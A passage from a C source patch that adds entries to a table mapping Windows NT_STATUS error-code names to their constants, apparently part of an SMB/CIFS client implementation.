++	{"NT_STATUS_RESOURCE_DATA_NOT_FOUND",
++	 NT_STATUS_RESOURCE_DATA_NOT_FOUND},
++	{"NT_STATUS_RESOURCE_TYPE_NOT_FOUND",
++	 NT_STATUS_RESOURCE_TYPE_NOT_FOUND},
++	{"NT_STATUS_RESOURCE_NAME_NOT_FOUND",
++	 NT_STATUS_RESOURCE_NAME_NOT_FOUND},
++	{"NT_STATUS_ARRAY_BOUNDS_EXCEEDED",
++	 NT_STATUS_ARRAY_BOUNDS_EXCEEDED},
++	{"NT_STATUS_FLOAT_DENORMAL_OPERAND",
++	 NT_STATUS_FLOAT_DENORMAL_OPERAND},
++	{"NT_STATUS_FLOAT_DIVIDE_BY_ZERO", NT_STATUS_FLOAT_DIVIDE_BY_ZERO},
++	{"NT_STATUS_FLOAT_INEXACT_RESULT", NT_STATUS_FLOAT_INEXACT_RESULT},
++	{"NT_STATUS_FLOAT_INVALID_OPERATION",
++	 NT_STATUS_FLOAT_INVALID_OPERATION},
++	{"NT_STATUS_FLOAT_OVERFLOW", NT_STATUS_FLOAT_OVERFLOW},
++	{"NT_STATUS_FLOAT_STACK_CHECK", NT_STATUS_FLOAT_STACK_CHECK},
++	{"NT_STATUS_FLOAT_UNDERFLOW", NT_STATUS_FLOAT_UNDERFLOW},
++	{"NT_STATUS_INTEGER_DIVIDE_BY_ZERO",
++	 NT_STATUS_INTEGER_DIVIDE_BY_ZERO},
++	{"NT_STATUS_INTEGER_OVERFLOW", NT_STATUS_INTEGER_OVERFLOW},
++	{"NT_STATUS_PRIVILEGED_INSTRUCTION",
++	 NT_STATUS_PRIVILEGED_INSTRUCTION},
++	{"NT_STATUS_TOO_MANY_PAGING_FILES",
++	 NT_STATUS_TOO_MANY_PAGING_FILES},
++	{"NT_STATUS_FILE_INVALID", NT_STATUS_FILE_INVALID},
++	{"NT_STATUS_ALLOTTED_SPACE_EXCEEDED",
++	 NT_STATUS_ALLOTTED_SPACE_EXCEEDED},
++	{"NT_STATUS_INSUFFICIENT_RESOURCES",
++	 NT_STATUS_INSUFFICIENT_RESOURCES},
++	{"NT_STATUS_DFS_EXIT_PATH_FOUND", NT_STATUS_DFS_EXIT_PATH_FOUND},
++	{"NT_STATUS_DEVICE_DATA_ERROR", NT_STATUS_DEVICE_DATA_ERROR},
++	{"NT_STATUS_DEVICE_NOT_CONNECTED", NT_STATUS_DEVICE_NOT_CONNECTED},
++	{"NT_STATUS_DEVICE_POWER_FAILURE", NT_STATUS_DEVICE_POWER_FAILURE},
++	{"NT_STATUS_FREE_VM_NOT_AT_BASE", NT_STATUS_FREE_VM_NOT_AT_BASE},
++	{"NT_STATUS_MEMORY_NOT_ALLOCATED", NT_STATUS_MEMORY_NOT_ALLOCATED},
++	{"NT_STATUS_WORKING_SET_QUOTA", NT_STATUS_WORKING_SET_QUOTA},
++	{"NT_STATUS_MEDIA_WRITE_PROTECTED",
++	 NT_STATUS_MEDIA_WRITE_PROTECTED},
++	{"NT_STATUS_DEVICE_NOT_READY", NT_STATUS_DEVICE_NOT_READY},
++	{"NT_STATUS_INVALID_GROUP_ATTRIBUTES",
++	 NT_STATUS_INVALID_GROUP_ATTRIBUTES},
++	{"NT_STATUS_BAD_IMPERSONATION_LEVEL",
++	 NT_STATUS_BAD_IMPERSONATION_LEVEL},
++	{"NT_STATUS_CANT_OPEN_ANONYMOUS", NT_STATUS_CANT_OPEN_ANONYMOUS},
++	{"NT_STATUS_BAD_VALIDATION_CLASS", NT_STATUS_BAD_VALIDATION_CLASS},
++	{"NT_STATUS_BAD_TOKEN_TYPE", NT_STATUS_BAD_TOKEN_TYPE},
++	{"NT_STATUS_BAD_MASTER_BOOT_RECORD",
++	 NT_STATUS_BAD_MASTER_BOOT_RECORD},
++	{"NT_STATUS_INSTRUCTION_MISALIGNMENT",
++	 NT_STATUS_INSTRUCTION_MISALIGNMENT},
++	{"NT_STATUS_INSTANCE_NOT_AVAILABLE",
++	 NT_STATUS_INSTANCE_NOT_AVAILABLE},
++	{"NT_STATUS_PIPE_NOT_AVAILABLE", NT_STATUS_PIPE_NOT_AVAILABLE},
++	{"NT_STATUS_INVALID_PIPE_STATE", NT_STATUS_INVALID_PIPE_STATE},
++	{"NT_STATUS_PIPE_BUSY", NT_STATUS_PIPE_BUSY},
++	{"NT_STATUS_ILLEGAL_FUNCTION", NT_STATUS_ILLEGAL_FUNCTION},
++	{"NT_STATUS_PIPE_DISCONNECTED", NT_STATUS_PIPE_DISCONNECTED},
++	{"NT_STATUS_PIPE_CLOSING", NT_STATUS_PIPE_CLOSING},
++	{"NT_STATUS_PIPE_CONNECTED", NT_STATUS_PIPE_CONNECTED},
++	{"NT_STATUS_PIPE_LISTENING", NT_STATUS_PIPE_LISTENING},
++	{"NT_STATUS_INVALID_READ_MODE", NT_STATUS_INVALID_READ_MODE},
++	{"NT_STATUS_IO_TIMEOUT", NT_STATUS_IO_TIMEOUT},
++	{"NT_STATUS_FILE_FORCED_CLOSED", NT_STATUS_FILE_FORCED_CLOSED},
++	{"NT_STATUS_PROFILING_NOT_STARTED",
++	 NT_STATUS_PROFILING_NOT_STARTED},
++	{"NT_STATUS_PROFILING_NOT_STOPPED",
++	 NT_STATUS_PROFILING_NOT_STOPPED},
++	{"NT_STATUS_COULD_NOT_INTERPRET", NT_STATUS_COULD_NOT_INTERPRET},
++	{"NT_STATUS_FILE_IS_A_DIRECTORY", NT_STATUS_FILE_IS_A_DIRECTORY},
++	{"NT_STATUS_NOT_SUPPORTED", NT_STATUS_NOT_SUPPORTED},
++	{"NT_STATUS_REMOTE_NOT_LISTENING", NT_STATUS_REMOTE_NOT_LISTENING},
++	{"NT_STATUS_DUPLICATE_NAME", NT_STATUS_DUPLICATE_NAME},
++	{"NT_STATUS_BAD_NETWORK_PATH", NT_STATUS_BAD_NETWORK_PATH},
++	{"NT_STATUS_NETWORK_BUSY", NT_STATUS_NETWORK_BUSY},
++	{"NT_STATUS_DEVICE_DOES_NOT_EXIST",
++	 NT_STATUS_DEVICE_DOES_NOT_EXIST},
++	{"NT_STATUS_TOO_MANY_COMMANDS", NT_STATUS_TOO_MANY_COMMANDS},
++	{"NT_STATUS_ADAPTER_HARDWARE_ERROR",
++	 NT_STATUS_ADAPTER_HARDWARE_ERROR},
++	{"NT_STATUS_INVALID_NETWORK_RESPONSE",
++	 NT_STATUS_INVALID_NETWORK_RESPONSE},
++	{"NT_STATUS_UNEXPECTED_NETWORK_ERROR",
++	 NT_STATUS_UNEXPECTED_NETWORK_ERROR},
++	{"NT_STATUS_BAD_REMOTE_ADAPTER", NT_STATUS_BAD_REMOTE_ADAPTER},
++	{"NT_STATUS_PRINT_QUEUE_FULL", NT_STATUS_PRINT_QUEUE_FULL},
++	{"NT_STATUS_NO_SPOOL_SPACE", NT_STATUS_NO_SPOOL_SPACE},
++	{"NT_STATUS_PRINT_CANCELLED", NT_STATUS_PRINT_CANCELLED},
++	{"NT_STATUS_NETWORK_NAME_DELETED", NT_STATUS_NETWORK_NAME_DELETED},
++	{"NT_STATUS_NETWORK_ACCESS_DENIED",
++	 NT_STATUS_NETWORK_ACCESS_DENIED},
++	{"NT_STATUS_BAD_DEVICE_TYPE", NT_STATUS_BAD_DEVICE_TYPE},
++	{"NT_STATUS_BAD_NETWORK_NAME", NT_STATUS_BAD_NETWORK_NAME},
++	{"NT_STATUS_TOO_MANY_NAMES", NT_STATUS_TOO_MANY_NAMES},
++	{"NT_STATUS_TOO_MANY_SESSIONS", NT_STATUS_TOO_MANY_SESSIONS},
++	{"NT_STATUS_SHARING_PAUSED", NT_STATUS_SHARING_PAUSED},
++	{"NT_STATUS_REQUEST_NOT_ACCEPTED", NT_STATUS_REQUEST_NOT_ACCEPTED},
++	{"NT_STATUS_REDIRECTOR_PAUSED", NT_STATUS_REDIRECTOR_PAUSED},
++	{"NT_STATUS_NET_WRITE_FAULT", NT_STATUS_NET_WRITE_FAULT},
++	{"NT_STATUS_PROFILING_AT_LIMIT", NT_STATUS_PROFILING_AT_LIMIT},
++	{"NT_STATUS_NOT_SAME_DEVICE", NT_STATUS_NOT_SAME_DEVICE},
++	{"NT_STATUS_FILE_RENAMED", NT_STATUS_FILE_RENAMED},
++	{"NT_STATUS_VIRTUAL_CIRCUIT_CLOSED",
++	 NT_STATUS_VIRTUAL_CIRCUIT_CLOSED},
++	{"NT_STATUS_NO_SECURITY_ON_OBJECT",
++	 NT_STATUS_NO_SECURITY_ON_OBJECT},
++	{"NT_STATUS_CANT_WAIT", NT_STATUS_CANT_WAIT},
++	{"NT_STATUS_PIPE_EMPTY", NT_STATUS_PIPE_EMPTY},
++	{"NT_STATUS_CANT_ACCESS_DOMAIN_INFO",
++	 NT_STATUS_CANT_ACCESS_DOMAIN_INFO},
++	{"NT_STATUS_CANT_TERMINATE_SELF", NT_STATUS_CANT_TERMINATE_SELF},
++	{"NT_STATUS_INVALID_SERVER_STATE", NT_STATUS_INVALID_SERVER_STATE},
++	{"NT_STATUS_INVALID_DOMAIN_STATE", NT_STATUS_INVALID_DOMAIN_STATE},
++	{"NT_STATUS_INVALID_DOMAIN_ROLE", NT_STATUS_INVALID_DOMAIN_ROLE},
++	{"NT_STATUS_NO_SUCH_DOMAIN", NT_STATUS_NO_SUCH_DOMAIN},
++	{"NT_STATUS_DOMAIN_EXISTS", NT_STATUS_DOMAIN_EXISTS},
++	{"NT_STATUS_DOMAIN_LIMIT_EXCEEDED",
++	 NT_STATUS_DOMAIN_LIMIT_EXCEEDED},
++	{"NT_STATUS_OPLOCK_NOT_GRANTED", NT_STATUS_OPLOCK_NOT_GRANTED},
++	{"NT_STATUS_INVALID_OPLOCK_PROTOCOL",
++	 NT_STATUS_INVALID_OPLOCK_PROTOCOL},
++	{"NT_STATUS_INTERNAL_DB_CORRUPTION",
++	 NT_STATUS_INTERNAL_DB_CORRUPTION},
++	{"NT_STATUS_INTERNAL_ERROR", NT_STATUS_INTERNAL_ERROR},
++	{"NT_STATUS_GENERIC_NOT_MAPPED", NT_STATUS_GENERIC_NOT_MAPPED},
++	{"NT_STATUS_BAD_DESCRIPTOR_FORMAT",
++	 NT_STATUS_BAD_DESCRIPTOR_FORMAT},
++	{"NT_STATUS_INVALID_USER_BUFFER", NT_STATUS_INVALID_USER_BUFFER},
++	{"NT_STATUS_UNEXPECTED_IO_ERROR", NT_STATUS_UNEXPECTED_IO_ERROR},
++	{"NT_STATUS_UNEXPECTED_MM_CREATE_ERR",
++	 NT_STATUS_UNEXPECTED_MM_CREATE_ERR},
++	{"NT_STATUS_UNEXPECTED_MM_MAP_ERROR",
++	 NT_STATUS_UNEXPECTED_MM_MAP_ERROR},
++	{"NT_STATUS_UNEXPECTED_MM_EXTEND_ERR",
++	 NT_STATUS_UNEXPECTED_MM_EXTEND_ERR},
++	{"NT_STATUS_NOT_LOGON_PROCESS", NT_STATUS_NOT_LOGON_PROCESS},
++	{"NT_STATUS_LOGON_SESSION_EXISTS", NT_STATUS_LOGON_SESSION_EXISTS},
++	{"NT_STATUS_INVALID_PARAMETER_1", NT_STATUS_INVALID_PARAMETER_1},
++	{"NT_STATUS_INVALID_PARAMETER_2", NT_STATUS_INVALID_PARAMETER_2},
++	{"NT_STATUS_INVALID_PARAMETER_3", NT_STATUS_INVALID_PARAMETER_3},
++	{"NT_STATUS_INVALID_PARAMETER_4", NT_STATUS_INVALID_PARAMETER_4},
++	{"NT_STATUS_INVALID_PARAMETER_5", NT_STATUS_INVALID_PARAMETER_5},
++	{"NT_STATUS_INVALID_PARAMETER_6", NT_STATUS_INVALID_PARAMETER_6},
++	{"NT_STATUS_INVALID_PARAMETER_7", NT_STATUS_INVALID_PARAMETER_7},
++	{"NT_STATUS_INVALID_PARAMETER_8", NT_STATUS_INVALID_PARAMETER_8},
++	{"NT_STATUS_INVALID_PARAMETER_9", NT_STATUS_INVALID_PARAMETER_9},
++	{"NT_STATUS_INVALID_PARAMETER_10", NT_STATUS_INVALID_PARAMETER_10},
++	{"NT_STATUS_INVALID_PARAMETER_11", NT_STATUS_INVALID_PARAMETER_11},
++	{"NT_STATUS_INVALID_PARAMETER_12", NT_STATUS_INVALID_PARAMETER_12},
++	{"NT_STATUS_REDIRECTOR_NOT_STARTED",
++	 NT_STATUS_REDIRECTOR_NOT_STARTED},
++	{"NT_STATUS_REDIRECTOR_STARTED", NT_STATUS_REDIRECTOR_STARTED},
++	{"NT_STATUS_STACK_OVERFLOW", NT_STATUS_STACK_OVERFLOW},
++	{"NT_STATUS_NO_SUCH_PACKAGE", NT_STATUS_NO_SUCH_PACKAGE},
++	{"NT_STATUS_BAD_FUNCTION_TABLE", NT_STATUS_BAD_FUNCTION_TABLE},
++	{"NT_STATUS_DIRECTORY_NOT_EMPTY", NT_STATUS_DIRECTORY_NOT_EMPTY},
++	{"NT_STATUS_FILE_CORRUPT_ERROR", NT_STATUS_FILE_CORRUPT_ERROR},
++	{"NT_STATUS_NOT_A_DIRECTORY", NT_STATUS_NOT_A_DIRECTORY},
++	{"NT_STATUS_BAD_LOGON_SESSION_STATE",
++	 NT_STATUS_BAD_LOGON_SESSION_STATE},
++	{"NT_STATUS_LOGON_SESSION_COLLISION",
++	 NT_STATUS_LOGON_SESSION_COLLISION},
++	{"NT_STATUS_NAME_TOO_LONG", NT_STATUS_NAME_TOO_LONG},
++	{"NT_STATUS_FILES_OPEN", NT_STATUS_FILES_OPEN},
++	{"NT_STATUS_CONNECTION_IN_USE", NT_STATUS_CONNECTION_IN_USE},
++	{"NT_STATUS_MESSAGE_NOT_FOUND", NT_STATUS_MESSAGE_NOT_FOUND},
++	{"NT_STATUS_PROCESS_IS_TERMINATING",
++	 NT_STATUS_PROCESS_IS_TERMINATING},
++	{"NT_STATUS_INVALID_LOGON_TYPE", NT_STATUS_INVALID_LOGON_TYPE},
++	{"NT_STATUS_NO_GUID_TRANSLATION", NT_STATUS_NO_GUID_TRANSLATION},
++	{"NT_STATUS_CANNOT_IMPERSONATE", NT_STATUS_CANNOT_IMPERSONATE},
++	{"NT_STATUS_IMAGE_ALREADY_LOADED", NT_STATUS_IMAGE_ALREADY_LOADED},
++	{"NT_STATUS_ABIOS_NOT_PRESENT", NT_STATUS_ABIOS_NOT_PRESENT},
++	{"NT_STATUS_ABIOS_LID_NOT_EXIST", NT_STATUS_ABIOS_LID_NOT_EXIST},
++	{"NT_STATUS_ABIOS_LID_ALREADY_OWNED",
++	 NT_STATUS_ABIOS_LID_ALREADY_OWNED},
++	{"NT_STATUS_ABIOS_NOT_LID_OWNER", NT_STATUS_ABIOS_NOT_LID_OWNER},
++	{"NT_STATUS_ABIOS_INVALID_COMMAND",
++	 NT_STATUS_ABIOS_INVALID_COMMAND},
++	{"NT_STATUS_ABIOS_INVALID_LID", NT_STATUS_ABIOS_INVALID_LID},
++	{"NT_STATUS_ABIOS_SELECTOR_NOT_AVAILABLE",
++	 NT_STATUS_ABIOS_SELECTOR_NOT_AVAILABLE},
++	{"NT_STATUS_ABIOS_INVALID_SELECTOR",
++	 NT_STATUS_ABIOS_INVALID_SELECTOR},
++	{"NT_STATUS_NO_LDT", NT_STATUS_NO_LDT},
++	{"NT_STATUS_INVALID_LDT_SIZE", NT_STATUS_INVALID_LDT_SIZE},
++	{"NT_STATUS_INVALID_LDT_OFFSET", NT_STATUS_INVALID_LDT_OFFSET},
++	{"NT_STATUS_INVALID_LDT_DESCRIPTOR",
++	 NT_STATUS_INVALID_LDT_DESCRIPTOR},
++	{"NT_STATUS_INVALID_IMAGE_NE_FORMAT",
++	 NT_STATUS_INVALID_IMAGE_NE_FORMAT},
++	{"NT_STATUS_RXACT_INVALID_STATE", NT_STATUS_RXACT_INVALID_STATE},
++	{"NT_STATUS_RXACT_COMMIT_FAILURE", NT_STATUS_RXACT_COMMIT_FAILURE},
++	{"NT_STATUS_MAPPED_FILE_SIZE_ZERO",
++	 NT_STATUS_MAPPED_FILE_SIZE_ZERO},
++	{"NT_STATUS_TOO_MANY_OPENED_FILES",
++	 NT_STATUS_TOO_MANY_OPENED_FILES},
++	{"NT_STATUS_CANCELLED", NT_STATUS_CANCELLED},
++	{"NT_STATUS_CANNOT_DELETE", NT_STATUS_CANNOT_DELETE},
++	{"NT_STATUS_INVALID_COMPUTER_NAME",
++	 NT_STATUS_INVALID_COMPUTER_NAME},
++	{"NT_STATUS_FILE_DELETED", NT_STATUS_FILE_DELETED},
++	{"NT_STATUS_SPECIAL_ACCOUNT", NT_STATUS_SPECIAL_ACCOUNT},
++	{"NT_STATUS_SPECIAL_GROUP", NT_STATUS_SPECIAL_GROUP},
++	{"NT_STATUS_SPECIAL_USER", NT_STATUS_SPECIAL_USER},
++	{"NT_STATUS_MEMBERS_PRIMARY_GROUP",
++	 NT_STATUS_MEMBERS_PRIMARY_GROUP},
++	{"NT_STATUS_FILE_CLOSED", NT_STATUS_FILE_CLOSED},
++	{"NT_STATUS_TOO_MANY_THREADS", NT_STATUS_TOO_MANY_THREADS},
++	{"NT_STATUS_THREAD_NOT_IN_PROCESS",
++	 NT_STATUS_THREAD_NOT_IN_PROCESS},
++	{"NT_STATUS_TOKEN_ALREADY_IN_USE", NT_STATUS_TOKEN_ALREADY_IN_USE},
++	{"NT_STATUS_PAGEFILE_QUOTA_EXCEEDED",
++	 NT_STATUS_PAGEFILE_QUOTA_EXCEEDED},
++	{"NT_STATUS_COMMITMENT_LIMIT", NT_STATUS_COMMITMENT_LIMIT},
++	{"NT_STATUS_INVALID_IMAGE_LE_FORMAT",
++	 NT_STATUS_INVALID_IMAGE_LE_FORMAT},
++	{"NT_STATUS_INVALID_IMAGE_NOT_MZ", NT_STATUS_INVALID_IMAGE_NOT_MZ},
++	{"NT_STATUS_INVALID_IMAGE_PROTECT",
++	 NT_STATUS_INVALID_IMAGE_PROTECT},
++	{"NT_STATUS_INVALID_IMAGE_WIN_16", NT_STATUS_INVALID_IMAGE_WIN_16},
++	{"NT_STATUS_LOGON_SERVER_CONFLICT",
++	 NT_STATUS_LOGON_SERVER_CONFLICT},
++	{"NT_STATUS_TIME_DIFFERENCE_AT_DC",
++	 NT_STATUS_TIME_DIFFERENCE_AT_DC},
++	{"NT_STATUS_SYNCHRONIZATION_REQUIRED",
++	 NT_STATUS_SYNCHRONIZATION_REQUIRED},
++	{"NT_STATUS_DLL_NOT_FOUND", NT_STATUS_DLL_NOT_FOUND},
++	{"NT_STATUS_OPEN_FAILED", NT_STATUS_OPEN_FAILED},
++	{"NT_STATUS_IO_PRIVILEGE_FAILED", NT_STATUS_IO_PRIVILEGE_FAILED},
++	{"NT_STATUS_ORDINAL_NOT_FOUND", NT_STATUS_ORDINAL_NOT_FOUND},
++	{"NT_STATUS_ENTRYPOINT_NOT_FOUND", NT_STATUS_ENTRYPOINT_NOT_FOUND},
++	{"NT_STATUS_CONTROL_C_EXIT", NT_STATUS_CONTROL_C_EXIT},
++	{"NT_STATUS_LOCAL_DISCONNECT", NT_STATUS_LOCAL_DISCONNECT},
++	{"NT_STATUS_REMOTE_DISCONNECT", NT_STATUS_REMOTE_DISCONNECT},
++	{"NT_STATUS_REMOTE_RESOURCES", NT_STATUS_REMOTE_RESOURCES},
++	{"NT_STATUS_LINK_FAILED", NT_STATUS_LINK_FAILED},
++	{"NT_STATUS_LINK_TIMEOUT", NT_STATUS_LINK_TIMEOUT},
++	{"NT_STATUS_INVALID_CONNECTION", NT_STATUS_INVALID_CONNECTION},
++	{"NT_STATUS_INVALID_ADDRESS", NT_STATUS_INVALID_ADDRESS},
++	{"NT_STATUS_DLL_INIT_FAILED", NT_STATUS_DLL_INIT_FAILED},
++	{"NT_STATUS_MISSING_SYSTEMFILE", NT_STATUS_MISSING_SYSTEMFILE},
++	{"NT_STATUS_UNHANDLED_EXCEPTION", NT_STATUS_UNHANDLED_EXCEPTION},
++	{"NT_STATUS_APP_INIT_FAILURE", NT_STATUS_APP_INIT_FAILURE},
++	{"NT_STATUS_PAGEFILE_CREATE_FAILED",
++	 NT_STATUS_PAGEFILE_CREATE_FAILED},
++	{"NT_STATUS_NO_PAGEFILE", NT_STATUS_NO_PAGEFILE},
++	{"NT_STATUS_INVALID_LEVEL", NT_STATUS_INVALID_LEVEL},
++	{"NT_STATUS_WRONG_PASSWORD_CORE", NT_STATUS_WRONG_PASSWORD_CORE},
++	{"NT_STATUS_ILLEGAL_FLOAT_CONTEXT",
++	 NT_STATUS_ILLEGAL_FLOAT_CONTEXT},
++	{"NT_STATUS_PIPE_BROKEN", NT_STATUS_PIPE_BROKEN},
++	{"NT_STATUS_REGISTRY_CORRUPT", NT_STATUS_REGISTRY_CORRUPT},
++	{"NT_STATUS_REGISTRY_IO_FAILED", NT_STATUS_REGISTRY_IO_FAILED},
++	{"NT_STATUS_NO_EVENT_PAIR", NT_STATUS_NO_EVENT_PAIR},
++	{"NT_STATUS_UNRECOGNIZED_VOLUME", NT_STATUS_UNRECOGNIZED_VOLUME},
++	{"NT_STATUS_SERIAL_NO_DEVICE_INITED",
++	 NT_STATUS_SERIAL_NO_DEVICE_INITED},
++	{"NT_STATUS_NO_SUCH_ALIAS", NT_STATUS_NO_SUCH_ALIAS},
++	{"NT_STATUS_MEMBER_NOT_IN_ALIAS", NT_STATUS_MEMBER_NOT_IN_ALIAS},
++	{"NT_STATUS_MEMBER_IN_ALIAS", NT_STATUS_MEMBER_IN_ALIAS},
++	{"NT_STATUS_ALIAS_EXISTS", NT_STATUS_ALIAS_EXISTS},
++	{"NT_STATUS_LOGON_NOT_GRANTED", NT_STATUS_LOGON_NOT_GRANTED},
++	{"NT_STATUS_TOO_MANY_SECRETS", NT_STATUS_TOO_MANY_SECRETS},
++	{"NT_STATUS_SECRET_TOO_LONG", NT_STATUS_SECRET_TOO_LONG},
++	{"NT_STATUS_INTERNAL_DB_ERROR", NT_STATUS_INTERNAL_DB_ERROR},
++	{"NT_STATUS_FULLSCREEN_MODE", NT_STATUS_FULLSCREEN_MODE},
++	{"NT_STATUS_TOO_MANY_CONTEXT_IDS", NT_STATUS_TOO_MANY_CONTEXT_IDS},
++	{"NT_STATUS_LOGON_TYPE_NOT_GRANTED",
++	 NT_STATUS_LOGON_TYPE_NOT_GRANTED},
++	{"NT_STATUS_NOT_REGISTRY_FILE", NT_STATUS_NOT_REGISTRY_FILE},
++	{"NT_STATUS_NT_CROSS_ENCRYPTION_REQUIRED",
++	 NT_STATUS_NT_CROSS_ENCRYPTION_REQUIRED},
++	{"NT_STATUS_DOMAIN_CTRLR_CONFIG_ERROR",
++	 NT_STATUS_DOMAIN_CTRLR_CONFIG_ERROR},
++	{"NT_STATUS_FT_MISSING_MEMBER", NT_STATUS_FT_MISSING_MEMBER},
++	{"NT_STATUS_ILL_FORMED_SERVICE_ENTRY",
++	 NT_STATUS_ILL_FORMED_SERVICE_ENTRY},
++	{"NT_STATUS_ILLEGAL_CHARACTER", NT_STATUS_ILLEGAL_CHARACTER},
++	{"NT_STATUS_UNMAPPABLE_CHARACTER", NT_STATUS_UNMAPPABLE_CHARACTER},
++	{"NT_STATUS_UNDEFINED_CHARACTER", NT_STATUS_UNDEFINED_CHARACTER},
++	{"NT_STATUS_FLOPPY_VOLUME", NT_STATUS_FLOPPY_VOLUME},
++	{"NT_STATUS_FLOPPY_ID_MARK_NOT_FOUND",
++	 NT_STATUS_FLOPPY_ID_MARK_NOT_FOUND},
++	{"NT_STATUS_FLOPPY_WRONG_CYLINDER",
++	 NT_STATUS_FLOPPY_WRONG_CYLINDER},
++	{"NT_STATUS_FLOPPY_UNKNOWN_ERROR", NT_STATUS_FLOPPY_UNKNOWN_ERROR},
++	{"NT_STATUS_FLOPPY_BAD_REGISTERS", NT_STATUS_FLOPPY_BAD_REGISTERS},
++	{"NT_STATUS_DISK_RECALIBRATE_FAILED",
++	 NT_STATUS_DISK_RECALIBRATE_FAILED},
++	{"NT_STATUS_DISK_OPERATION_FAILED",
++	 NT_STATUS_DISK_OPERATION_FAILED},
++	{"NT_STATUS_DISK_RESET_FAILED", NT_STATUS_DISK_RESET_FAILED},
++	{"NT_STATUS_SHARED_IRQ_BUSY", NT_STATUS_SHARED_IRQ_BUSY},
++	{"NT_STATUS_FT_ORPHANING", NT_STATUS_FT_ORPHANING},
++	{"NT_STATUS_PARTITION_FAILURE", NT_STATUS_PARTITION_FAILURE},
++	{"NT_STATUS_INVALID_BLOCK_LENGTH", NT_STATUS_INVALID_BLOCK_LENGTH},
++	{"NT_STATUS_DEVICE_NOT_PARTITIONED",
++	 NT_STATUS_DEVICE_NOT_PARTITIONED},
++	{"NT_STATUS_UNABLE_TO_LOCK_MEDIA", NT_STATUS_UNABLE_TO_LOCK_MEDIA},
++	{"NT_STATUS_UNABLE_TO_UNLOAD_MEDIA",
++	 NT_STATUS_UNABLE_TO_UNLOAD_MEDIA},
++	{"NT_STATUS_EOM_OVERFLOW", NT_STATUS_EOM_OVERFLOW},
++	{"NT_STATUS_NO_MEDIA", NT_STATUS_NO_MEDIA},
++	{"NT_STATUS_NO_SUCH_MEMBER", NT_STATUS_NO_SUCH_MEMBER},
++	{"NT_STATUS_INVALID_MEMBER", NT_STATUS_INVALID_MEMBER},
++	{"NT_STATUS_KEY_DELETED", NT_STATUS_KEY_DELETED},
++	{"NT_STATUS_NO_LOG_SPACE", NT_STATUS_NO_LOG_SPACE},
++	{"NT_STATUS_TOO_MANY_SIDS", NT_STATUS_TOO_MANY_SIDS},
++	{"NT_STATUS_LM_CROSS_ENCRYPTION_REQUIRED",
++	 NT_STATUS_LM_CROSS_ENCRYPTION_REQUIRED},
++	{"NT_STATUS_KEY_HAS_CHILDREN", NT_STATUS_KEY_HAS_CHILDREN},
++	{"NT_STATUS_CHILD_MUST_BE_VOLATILE",
++	 NT_STATUS_CHILD_MUST_BE_VOLATILE},
++	{"NT_STATUS_DEVICE_CONFIGURATION_ERROR",
++	 NT_STATUS_DEVICE_CONFIGURATION_ERROR},
++	{"NT_STATUS_DRIVER_INTERNAL_ERROR",
++	 NT_STATUS_DRIVER_INTERNAL_ERROR},
++	{"NT_STATUS_INVALID_DEVICE_STATE", NT_STATUS_INVALID_DEVICE_STATE},
++	{"NT_STATUS_IO_DEVICE_ERROR", NT_STATUS_IO_DEVICE_ERROR},
++	{"NT_STATUS_DEVICE_PROTOCOL_ERROR",
++	 NT_STATUS_DEVICE_PROTOCOL_ERROR},
++	{"NT_STATUS_BACKUP_CONTROLLER", NT_STATUS_BACKUP_CONTROLLER},
++	{"NT_STATUS_LOG_FILE_FULL", NT_STATUS_LOG_FILE_FULL},
++	{"NT_STATUS_TOO_LATE", NT_STATUS_TOO_LATE},
++	{"NT_STATUS_NO_TRUST_LSA_SECRET", NT_STATUS_NO_TRUST_LSA_SECRET},
++	{"NT_STATUS_NO_TRUST_SAM_ACCOUNT", NT_STATUS_NO_TRUST_SAM_ACCOUNT},
++	{"NT_STATUS_TRUSTED_DOMAIN_FAILURE",
++	 NT_STATUS_TRUSTED_DOMAIN_FAILURE},
++	{"NT_STATUS_TRUSTED_RELATIONSHIP_FAILURE",
++	 NT_STATUS_TRUSTED_RELATIONSHIP_FAILURE},
++	{"NT_STATUS_EVENTLOG_FILE_CORRUPT",
++	 NT_STATUS_EVENTLOG_FILE_CORRUPT},
++	{"NT_STATUS_EVENTLOG_CANT_START", NT_STATUS_EVENTLOG_CANT_START},
++	{"NT_STATUS_TRUST_FAILURE", NT_STATUS_TRUST_FAILURE},
++	{"NT_STATUS_MUTANT_LIMIT_EXCEEDED",
++	 NT_STATUS_MUTANT_LIMIT_EXCEEDED},
++	{"NT_STATUS_NETLOGON_NOT_STARTED", NT_STATUS_NETLOGON_NOT_STARTED},
++	{"NT_STATUS_ACCOUNT_EXPIRED", NT_STATUS_ACCOUNT_EXPIRED},
++	{"NT_STATUS_POSSIBLE_DEADLOCK", NT_STATUS_POSSIBLE_DEADLOCK},
++	{"NT_STATUS_NETWORK_CREDENTIAL_CONFLICT",
++	 NT_STATUS_NETWORK_CREDENTIAL_CONFLICT},
++	{"NT_STATUS_REMOTE_SESSION_LIMIT", NT_STATUS_REMOTE_SESSION_LIMIT},
++	{"NT_STATUS_EVENTLOG_FILE_CHANGED",
++	 NT_STATUS_EVENTLOG_FILE_CHANGED},
++	{"NT_STATUS_NOLOGON_INTERDOMAIN_TRUST_ACCOUNT",
++	 NT_STATUS_NOLOGON_INTERDOMAIN_TRUST_ACCOUNT},
++	{"NT_STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT",
++	 NT_STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT},
++	{"NT_STATUS_NOLOGON_SERVER_TRUST_ACCOUNT",
++	 NT_STATUS_NOLOGON_SERVER_TRUST_ACCOUNT},
++	{"NT_STATUS_DOMAIN_TRUST_INCONSISTENT",
++	 NT_STATUS_DOMAIN_TRUST_INCONSISTENT},
++	{"NT_STATUS_FS_DRIVER_REQUIRED", NT_STATUS_FS_DRIVER_REQUIRED},
++	{"NT_STATUS_NO_USER_SESSION_KEY", NT_STATUS_NO_USER_SESSION_KEY},
++	{"NT_STATUS_USER_SESSION_DELETED", NT_STATUS_USER_SESSION_DELETED},
++	{"NT_STATUS_RESOURCE_LANG_NOT_FOUND",
++	 NT_STATUS_RESOURCE_LANG_NOT_FOUND},
++	{"NT_STATUS_INSUFF_SERVER_RESOURCES",
++	 NT_STATUS_INSUFF_SERVER_RESOURCES},
++	{"NT_STATUS_INVALID_BUFFER_SIZE", NT_STATUS_INVALID_BUFFER_SIZE},
++	{"NT_STATUS_INVALID_ADDRESS_COMPONENT",
++	 NT_STATUS_INVALID_ADDRESS_COMPONENT},
++	{"NT_STATUS_INVALID_ADDRESS_WILDCARD",
++	 NT_STATUS_INVALID_ADDRESS_WILDCARD},
